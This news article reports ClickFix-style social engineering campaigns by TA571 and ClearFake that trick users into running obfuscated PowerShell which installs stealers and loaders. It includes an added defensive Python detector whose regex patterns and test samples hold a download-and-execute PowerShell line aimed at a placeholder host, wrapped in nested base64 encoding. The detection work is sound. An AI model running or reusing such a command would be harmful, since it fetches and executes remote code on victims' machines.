
Hackers Exploit New Social Engineering to Deploy Malware

Highlights

  • Hackers employ new social engineering to run PowerShell scripts.

  • Techniques include obfuscated scripts and browser injects.

  • Continuous user education is crucial to combat these threats.

Ethan Moreno
Last updated: 18 June, 2024 - 12:46 pm

Cybersecurity researchers at Proofpoint recently uncovered a sophisticated social engineering technique employed by hackers to run PowerShell and install malware. This method leverages psychological manipulation to trick users into performing harmful actions, such as surrendering their credentials or executing malicious scripts. The attackers have been using this strategy to exploit security loopholes, resulting in widespread malware infections.


New Social Engineering Technique

Threat actors like TA571 and a malicious activity cluster, ClearFake, have been deceiving users into copying and pasting dangerous PowerShell scripts, thereby compromising their systems. Through methods such as malspam and browser injects, the attackers present users with fake error messages, prompting them to run scripts that ultimately download malware payloads, including DarkGate, Matanbuchus, and NetSupport.

Since March 2024, TA571 has been using this technique, while ClearFake began similar campaigns in early April and continued until June. The deceptive tactics include obfuscated scripts executed in multiple stages, which eventually install various malware families like Lumma Stealer and Amadey Loader. Techniques like EtherHiding and ZIP executable bundling further complicate detection, making it harder for security systems to identify and neutralize the threats.
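A defender-side illustration of the multi-stage obfuscation described above, added here and not taken from Proofpoint's report or from this article: a heuristic that scores PowerShell command lines from process-creation logs, unwrapping nested `-EncodedCommand` layers before matching. The patterns, weights, alert threshold and sample command lines are all assumptions constructed for the example.

```python
import base64
import re

# Patterns, weights and threshold are assumptions for illustration.
ENC = re.compile(r"(?i)\s-e[a-z]{0,13}\s+([A-Za-z0-9+/]{16,}={0,2})")
TRAITS = {
    "hidden_window": (re.compile(r"(?i)\s-w[a-z]{0,10}\s+h[a-z]*\b"), 2),
    "download": (re.compile(r"(?i)\b(iwr|irm|invoke-webrequest|invoke-restmethod|"
                            r"downloadstring|downloadfile|start-bitstransfer)\b"), 2),
    "dynamic_exec": (re.compile(r"(?i)\b(iex|invoke-expression)\b"), 2),
}
ENCODED_WEIGHT, ALERT_AT = 3, 4

def decode_layer(text):
    """Return the UTF-16LE text behind an -EncodedCommand argument, or None."""
    m = ENC.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # invalid base64, or bytes that are not UTF-16LE
        return None

def assess(cmdline, max_layers=3):
    """Score a command line, unwrapping nested encoded stages before matching."""
    hits, text = set(), cmdline
    for _ in range(max_layers):
        hits |= {name for name, (rx, _) in TRAITS.items() if rx.search(text)}
        inner = decode_layer(text)
        if inner is None:
            break
        hits.add("encoded_command")
        text = " " + inner
    score = sum(TRAITS[h][1] if h in TRAITS else ENCODED_WEIGHT for h in hits)
    return score, sorted(hits)

def _enc(script):  # base64 over UTF-16LE, the form -EncodedCommand expects
    return base64.b64encode(script.encode("utf-16-le")).decode()

# Constructed process-creation command lines (not taken from the campaigns).
STAGE = "iex (iwr 'http://stage.example.invalid/a')"
SAMPLES = [
    r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1",
    "powershell.exe -ExecutionPolicy RemoteSigned -Command Get-ChildItem",
    "powershell.exe -w hidden -enc " + _enc(STAGE),
    "powershell.exe -enc " + _enc("powershell -w hidden -enc " + _enc(STAGE)),
]

if __name__ == "__main__":
    for s in SAMPLES:
        score, hits = assess(s)
        print("ALERT" if score >= ALERT_AT else "ok   ", score, hits)
```

The last sample shows why decoding matters: its outer command line carries none of the download or execution traits until both encoded layers are unwrapped.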

Campaigns and Techniques

Researchers have identified the browser update overlay, nicknamed “ClickFix,” as a significant element in these attacks. This deceptive overlay appears on compromised websites, tricking users into consenting to run malicious PowerShell scripts. These scripts initially distributed Vidar Stealer, but by mid-May, the campaign evolved into what is now known as ClearFake. TA571’s campaigns also include HTML lures with fake error messages that prompt victims to paste and execute malicious scripts, resulting in infections from malware like Matanbuchus and DarkGate.

In the past, similar social engineering tactics have been used by various threat actors to exploit human vulnerabilities and deploy malware. However, the current wave of attacks demonstrates a higher level of sophistication in exploiting user trust through trusted applications and user interactions. This evolution highlights the necessity for continuous advancements in cybersecurity measures and user education to combat these increasingly complex threats.

Comparing this information to earlier reports, it is evident that social engineering remains a prevalent and effective method for cybercriminals. Previous incidents also focused on exploiting psychological aspects to deceive users, but the current techniques show an increased use of multi-stage infection chains and advanced obfuscation methods. This trend indicates a growing emphasis on bypassing traditional security controls and leveraging trusted user actions to achieve malicious objectives.

Overall, the ongoing developments in social engineering tactics underscore the importance of enhancing cybersecurity awareness and training. Organizations must prioritize user education to recognize and report such attempts, thereby reducing the risk of successful attacks. Continuous monitoring and updating of security protocols are essential to stay ahead of these evolving threats.
